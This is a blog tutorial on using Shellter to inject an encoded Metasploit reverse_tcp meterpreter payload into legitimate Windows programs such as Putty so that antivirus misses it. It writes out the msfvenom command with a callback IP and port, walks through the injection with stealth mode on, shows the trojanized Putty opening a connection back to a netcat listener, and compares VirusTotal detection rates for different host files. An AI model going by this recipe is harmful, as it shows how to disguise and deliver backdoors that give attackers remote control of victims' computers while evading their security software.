Getting started to inject encoded payload with Shellter
One major problem that most Ethical hackers and penetration testers face is bypassing Anti-Virus software when executing payloads. If you are running an exploit or Shellcode that you wrote the code yourself, Anti-Virus software might not be a significant problem. However, if you are using pre-developed shellcodes/ payloads generated by tools like Metasploit, there is a high chance that it's signed as "malicious" by most AV software out there. Luckily, instead of spending hours researching and practicing how to evade AVs, you can use Shellter to inject your exploit into legit software like VNC, Putty, Winrar, and so much more.
What is Shellter?
Shellter is a dynamic shellcode injection tool used to inject exploits and Shellcode into native Windows applications. As of now, Shellter only supports injecting 32-bit applications. However, Shellter is available for both 32-bit and 64-bit applications, and it is available for different platforms, including Windows, Linux, and macOS. The Shellcode can be anything from user-coded exploits to those generated by tools like Metasploit. Shellter does not modify the host file/ PE to keep everything straightforward, including memory access or Read - Write and Execute permissions.
Shellter Features
- Compatible with Windows systems (x86 and x64) and available for Windows and macOS using Wine/ Crossover
- It's portable and doesn't require any complicated setups to run the tool
- Supports all types of encoding used by Metasploit
- It doesn't rely on system dependencies like Python, C/ C++ modules, etc
- Supports custom encoding generated by the user
- Supports injecting multiple payloads/ exploits in the same PE
- It comes embedded with several Metasploit payloads. Therefore, you can use Shellter to generate a payload and inject it into a PE, saving you much time.
- It's free
You can read more about Shellter's features on their official website.
Download and Install Shellter
As we stated above, Shellter is available for Windows, Linux, and macOS. In this post, we will install Shellter on Kali Linux - The leading penetration testing and security auditing operating system in the market today. You can read more blogs on Kali Linux and Ethical Hacking on our Ethical hacking section.
To install Shellter on Kali Linux, execute the command below on your Terminal.
Note: If you are running a fresh installation of Kali Linux, you need to update the repositories. Check out our master guide on Kali Linux repositories.
sudo apt update sudo apt install shellter
After successfully installing Shellter on Kali Linux, we need to install Wine responsible for running Shellter on Linux systems. Execute the commands below on the Terminal.
sudo dpkg --add-architecture i386 sudo apt update sudo apt -y install wine32
Create a Payload With Metasploit
As we stated above, Shellter can be used with several payloads, including user-coded payload, Metasploit exploits, and much more. Additionally, it also comes embedded with several Metasploit exploits. However, as a test, we will generate a payload with Metasploit and use Shellter to inject in an executable Windows application like Putty.exe (32 bit). You can check out our Metasploit Tutorials for an in-depth guide on using Metasploit on Kali Linux.
Our target (victim) machine is Windows, and our attacking machine is the Kali Linux system. You need to get the IP addresses of both machines as we will require them when generating the payload. In our case, the IP addresses are assigned as follows:
- Kali Linux: 192.168.1.46
- Windows: 192.168.1.52
ip a s
to get the IP of your Kali Linux system. For Windows, run the command ipconfig
on the command prompt.Launch the Terminal and use the syntax below to generate a Windows Reverse TCP payload with msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali-IP] LPORT=[Listening-Port] -e x86/shikata_ga_nai -i 10 -f raw -o [path-to-where-you-save-the-payload] e.g msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.46 LPORT=5657 -e x86/shikata_ga_nai -i 10 -f raw -o /home/golinux/Desktop/PhotoEditor.raw
Let's look at the code above in detail:
msfvenom
: (a combination of Msfpayload and Msfencode) - It is a command-line utility of Metasploit used to generate shellcodes.-p windows/meterpreter/reverse_tcp
: Here, we specify the type of payload we want to create. In this case, we are creating a Windows Reverse TCP payload. It will give us a backdoor to the victims' machine.LHOST=192.168.1.46
: That is the local machine's IP (Kali Linux).LPORT=5657
: That is the port we will use to listen to any incoming connections from the victims' PC. We highly recommend using a number greater than 1000 but less than 65535.-e x86/shikata_ga_nai -i 10
: This is the encoder we will use to encode and obfuscate our payload. However, don't feel limited to Shikata as many other encoders are available in Msfvenom.-f raw
: That is the format we want to use for our payload. Even though you can specify an extension like "exe," the "raw" format or binary is much easier to inject in a Windows PE.-o /home/golinux/Desktop/PhotoEditor.raw
: That's sets the name of the payload and the path where we will store it.
When we run the ls
command on our Desktop directory, you can see that we successfully create our payload - PhotoEditor.raw.
Inject Encoded Payload into Putty With Shellter
Launch Shellter by executing the command below on your Terminal to get started.
shelter
After a few seconds, another Terminal window will open, revealing the user-friendly prompts for using Shellter.
Follow the steps below:
- The first prompt will ask you to choose the operation mode. You can choose between Automatic and Manual. For this post, we will use Automatic. Therefore, type "
A
" and hit Enter. - Next, you will be prompted to set your PE target. The Windows executable you want to inject with the payload we generated with Msfvenom. In our case, we downloaded Putty.exe (32 bit) and placed it on our Desktop. We will provide the path to this file as shown below.
This step might take up to two minutes, depending on your system specifications. - Next, you will see a prompt "whether you want to enable Stealth mode." Select Yes by typing "Y" and pressing Enter.
- You will see a list of payloads that you can use to inject the PE. You will also see a prompt on whether you want to use any of the listed payloads or a custom payload. In our case, we have already created an exploit with Msfvenom. Therefore, select "C" for custom payload.
- Next, you will need to specify the path to your payload.
- You will see another prompt, "Is this payload a reflective DLL loader?" Select "NO" by typing "N," and press Enter to continue.
That's it! At this point, sit back and wait for Shellter to inject your exploit into the target PE.
Test the Injected Shellcode
To test the payload, we will carry out the steps below:
Start Netcat on our Kali Linux to listen to the port we specified on our payload. Which is port 5657.
We will copy the file we injected with the payload to the Windows system to create a Reverse TCP connection to the Kali system.
So, we copied the Putty.exe file to our Windows system and executed it. As we expected, Putty successfully launched on our Windows system. See the image below.
Also, something interesting happened. When we go back to our netcat window, we see a successful connection from our Windows system. Therefore, if we had used a tool like Meterpreter to start a "meterpreter" session, we could easily execute remote commands on our Windows system.
Test the Injected Shellcode on Anti Virus Software
Now, we have one more challenge remaining - Bypassing AV software. For this post, we will use Viru total for demonstration. However, beware because this site shares samples with antivirus vendors. To get started, open the Virus Total website and upload the PE. In our case, it's the Putty.exe file. After running a scan on our file, we found that 29 out of 67 Anti virus software flagged our file as malicious. See the image below.
But wait! There is something interesting to note. We repeated the whole process and used a different PE this time. We use Xpra.exe instead of Putty. The main difference between these two files is size. Putty is around 1.1 MB, while Xpra is around 102.8 MB. After injecting Xpra with our payload and testing it on Virus total, only Seven out 60 AV software detected it as a malicious file.
Therefore, we can deduce that the more complex the target PE file, the harder it will be for Antiviruses to detect our injected Shell code.
Conclusion
In this post, we have given you a detailed guide on getting started with Shellter. However, there is still a lot that you can still do with Shellter there than what we have discussed. For that, please feel free to check out the official Shellter manual. For users who love interacting with GUI tools, you should get your hopes high since Shellter developers have announced releasing a GUI version of the tool. Please feel free to share with our readers in the comments any more tricks and tips you discovered while using Shellter.